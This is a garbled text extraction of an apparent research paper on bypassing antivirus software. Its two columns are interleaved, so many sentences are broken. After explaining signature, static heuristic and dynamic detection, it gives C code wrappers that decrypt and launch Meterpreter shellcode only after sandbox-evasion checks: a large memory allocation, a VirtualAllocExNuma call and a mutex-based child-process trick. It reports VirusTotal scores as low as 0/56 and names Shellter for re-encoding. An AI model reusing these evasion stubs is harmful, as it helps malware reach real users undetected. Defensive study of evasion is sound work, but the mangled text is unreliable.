Professional Documents
Culture Documents
Bypassing Antivirus and Antivirus Vulnerabilities: Ntroduction
Bypassing Antivirus and Antivirus Vulnerabilities: Ntroduction
These systems search executables and other self-decrypted in antivirus sandbox, then
documents for strings of character, known to analysis of the new code can trigger some
occur in specific pieces of malware. If a file suspicious behavior. If one uses
contains the exact same string as one the string encryption/decryption stub to hide a malicious,
in the antivirus database, the file will be most antivirus will be able to detect it provide
detected as malicious otherwise it will not. they can bypass the decryption phase.
It is still possible to build a signature on an This means that bypassing dynamic analysis
encrypted malicious code when looking at implies two things:
specific instructions in decryption stub. 1. Having an undetectable self-decryption
mechanism.
From the offense side, studies have shown that 2. Prevent the antivirus to execute the
approximately more than 20,000 new stains of decryption stub.
malware appear every day [12]. For a signature
based antivirus to accurately detect all these ANTIVIRUS LIMITATIONS
strains it would require knowledge of every Dynamic analysis is a complex stuff, being able
single strain released, which is quite an to scan millions of file, running them on
impossible task. Some malware is bound to be emulated environment, checking all signatures,
missed. it also has limitations.
2) STATIC HEURISTIC ANALYSIS [10] The dynamic analysis model has three main
Static Heuristic are a branch of heuristic limitations which can be exploited [6-7]:
techniques that try to determine if a suspect 1. Scans has to very fast so there is a limit
to the number of operations it can run for
program is malicious by examining the structure
each scan at a particular time.
and contents of the program in an inactive state 2. The environment is emulated not so
and trying to find code fragments that have been aware of the specific of the machine and
commonly used for malicious end in the past. malware environment
This type of technique is especially dependent 3. The emulated/sandbox environment has
on having detailed knowledge not only of the some specification which can be
contents past malware but also the contents of detected by the malware
legitimate programs so as to avoid alerting on
the presence of code that though heavily used by Recent researches [1-5] have shown that most of
malware is also common in legitimate software. the malwares/vulnerabilities exist in executable
One of the strengths of static heuristic is that decompression and data decompression
unlike dynamic heuristic it is able to examine components.
Any mistake in these throws open door for the
multiple possible program execution paths due
vulnerabilities.
to the fact that it’s looking at all the contents of
the program instead of just code that would get BYPASSING ANTIVIRUS
executed during one particular invocation of the The more options you have to re-encode your
program. malware, the better chance you have of re-
Unfortunately, malware writers have developed encoding malware to get past of antiviruses.
a number of techniques to obfuscate their code For the antivirus evasion research purpose, we
in such way as to present a heuristic engine used shellter [16]. Shellter is a program, which
from being able to see the actual code and thus is capable of re-encoding any native 32-bit
preventing it from performing static analysis on standalone windows application.
that code.
3) Dynamic analysis [10] Since we are trying to avoid antivirus detection,
Nowadays most of the antivirus will rely on a we need to avoid anything that might look
suspicious to antivirus software such as packed
dynamic approach. When an executable is
applications or applications that have more than
scanned, it is launched in a virtual environment one section containing executable code.
for a short amount of time. Indeed, the code is
Next, we have discussed various methods for Here’s the copy of the main function:
bypassing antivirus
#define MEM 100000000
1. METHOD A: int main()
We created a c code, Function 1, calling non {
encoded Meterpreter shellcode. char * memdmp=NULL;
Here’s the main function: memdmp=(char *) malloc(MEM);
int main(void) if(memdmp!=NULL){
{ memset(memdmp,00,MEM);
Decryptcodesection();
Startshellcode(); free(memdmp);
return 0; decryptCodeSection();
} startShellCode();
Function 1: C code of Meterpreter shellcode.
}
return 0;
This version of the code has a virus total score }
of 2/56 [17].
Function 2: C code of allocating 100
megabytes of memory
linked to a whole set of functions declare in In this code, it will only start decryption code if
Kernal32.dll. a certain mutex object already exists on the
system. The method is that if the object does not
Here’s the copy of the main function : exist, this code will create and call a new
int main( void ) { instance to itself. The child process will try to
LPVOID mem = NULL; create the mutex before the father process dies
mem = and will fall in to the error code branch.
VirtualAllocExNuma(GetCurrentProcess Here’s the copy of the main function:
(), NULL, 1000, MEM_RESERVE |
MEM_COMMIT, int main()
PAGE_EXECUTE_READWRITE,0); {
if (mem != NULL) HANDLE mutex;
{ mutex = CreateMutex(NULL, TRUE,
decryptCodeSection(); "muuuu");
startShellCode(); if (GetLastError()
} ==ERROR_ALREADY_EXISTS) {
return 0; decryptCodeSection();
} startShellCode();
}
Function 3: C code to configure memory else
management. {
startExe("File.exe");
This version of the code has a virus total score Sleep(100);
of 0/56[17]. }
return 0;
}
4. METHOD D:
Antivirus are generally not able to follow parent FIGURE 4- Screenshot of virus total with
and child process. They will scan the parent and
score of 0/56.
not the child process even if it is in fact the
Figure 4 shows the screenshot of results
same code.
obtained from Function 4.